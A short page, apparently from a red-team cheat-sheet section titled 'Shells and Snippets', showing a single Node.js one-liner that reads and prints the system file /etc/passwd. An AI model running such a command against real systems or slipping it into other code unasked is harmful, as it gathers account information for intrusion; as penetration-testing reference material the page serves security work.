←
≡
search
Ask or search…
⌘
K
Red Team
›
Shells and Snippets
JavaScript
Read system file
console
.
log
(
require
(
'fs'
).
readFileSync
(
'/etc/passwd'
,
'utf-8'
));
copy
← Previous
Bash
Next →
C